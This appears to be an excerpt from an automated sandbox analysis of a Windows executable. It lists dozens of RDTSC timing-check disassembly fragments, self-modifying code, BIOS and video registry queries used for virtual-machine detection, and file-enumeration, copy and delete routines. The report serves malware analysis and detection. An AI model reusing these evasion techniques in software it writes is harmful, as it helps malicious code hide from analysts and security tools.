              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6ED34 second address: D6ED3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D889 second address: D7D88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D88D second address: D7D8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA1D8D64E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FA1D8D64E62h 0x00000012 jnc 00007FA1D8D64E56h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D8A7 second address: D7D8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D8AB second address: D7D905 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1D8D64E5Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jng 00007FA1D8D64E56h 0x00000010 push edi 0x00000011 jmp 00007FA1D8D64E68h 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c ja 00007FA1D8D64E56h 0x00000022 jmp 00007FA1D8D64E61h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pushad 0x0000002b jmp 00007FA1D8D64E5Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D905 second address: D7D90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80DDE second address: D80DF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FA1D8D64E56h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80DF0 second address: D80DFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FA1D8D18342h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80DFE second address: D80E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86CF8 second address: D86D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FA1D8D18349h 0x0000000b jno 00007FA1D8D18336h 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86D1E second address: D86D25 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86D25 second address: D86D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jns 00007FA1D8D18336h 0x00000010 push eax 0x00000011 pop eax 0x00000012 je 00007FA1D8D18336h 0x00000018 jmp 00007FA1D8D18341h 0x0000001d popad 0x0000001e push ecx 0x0000001f jo 00007FA1D8D18336h 0x00000025 pop ecx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87008 second address: D8701A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1D8D64E56h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8701A second address: D8701E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8701E second address: D87022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87022 second address: D8703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA1D8D18341h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D871C5 second address: D871CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D871CB second address: D871F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FA1D8D18344h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FA1D8D18336h 0x00000014 jmp 00007FA1D8D1833Ah 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87363 second address: D8736D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA1D8D64E56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D874E7 second address: D874EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BD1C second address: D8BD20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BD20 second address: D8BD24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9CBE3 second address: C9CBFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jl 00007FA1D8D64E5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97EC9 second address: D97EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D18347h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAC8 second address: DAAAD2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1D8D64E56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAD2 second address: DAAAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAD8 second address: DAAAEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1D8D64E61h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAEE second address: DAAAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAAF4 second address: DAAAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA73C second address: DAA746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA1D8D18336h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA746 second address: DAA74A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA74A second address: DAA761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA1D8D1833Fh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA761 second address: DAA76D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA1D8D64E5Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0436 second address: DC043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC043A second address: DC0479 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1D8D64E56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FA1D8D64E61h 0x00000016 jmp 00007FA1D8D64E65h 0x0000001b popad 0x0000001c pop edi 0x0000001d pushad 0x0000001e push eax 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF289 second address: DBF2AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FA1D8D18338h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF3F9 second address: DBF3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF3FF second address: DBF403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF403 second address: DBF421 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1D8D64E64h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF421 second address: DBF474 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18340h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FA1D8D18349h 0x0000000f jmp 00007FA1D8D1833Bh 0x00000014 pop ebx 0x00000015 popad 0x00000016 je 00007FA1D8D1834Dh 0x0000001c jmp 00007FA1D8D1833Fh 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF5A0 second address: DBF5B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D64E5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF5B3 second address: DBF5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 ja 00007FA1D8D18336h 0x0000000d jmp 00007FA1D8D1833Fh 0x00000012 pop edi 0x00000013 pop edx 0x00000014 push esi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jnp 00007FA1D8D18336h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF5E4 second address: DBF5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF5E8 second address: DBF5EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF722 second address: DBF726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF726 second address: DBF72C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBF8E1 second address: DBF8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBFCDE second address: DBFCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBFFE5 second address: DBFFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBFFE9 second address: DBFFFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D1833Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DBFFFC second address: DC0005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5EBF second address: DC5EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC7ED4 second address: DC7EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC7EDD second address: DC7EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC7EE1 second address: DC7EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51001FC second address: 5100200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100200 second address: 5100204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100204 second address: 510020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 510020A second address: 5100253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushfd 0x00000006 jmp 00007FA1D8D64E5Eh 0x0000000b sbb si, CC58h 0x00000010 jmp 00007FA1D8D64E5Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007FA1D8D64E69h 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100253 second address: 5100257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5100257 second address: 510025D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 510025D second address: 510029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1D8D18342h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FA1D8D18340h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA1D8D18347h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 510029F second address: 51002B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1D8D64E64h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51002B7 second address: 51002BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDEBDF second address: CDEBE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CDEBE3 second address: CDEBE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B2FA23 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B2F923 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CD2A50 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CFDC9A instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D5F514 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_1-28558)
              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime, DecisionNodes (graph_1-27376)
              Source: C:\Users\user\Desktop\file.exe | API coverage: 4.6 %
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F19F0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008F19F0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F3A70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F3A70
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008EDB80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008EDB80
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F13A0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F13A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F13B9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F13B9
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FE3F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008FE3F0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F4C89 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008F4C89
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F24E0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_008F24E0
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F24F9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008F24F9
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008F4C70 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F4C70
              Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_008FCDD0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008FCDD0
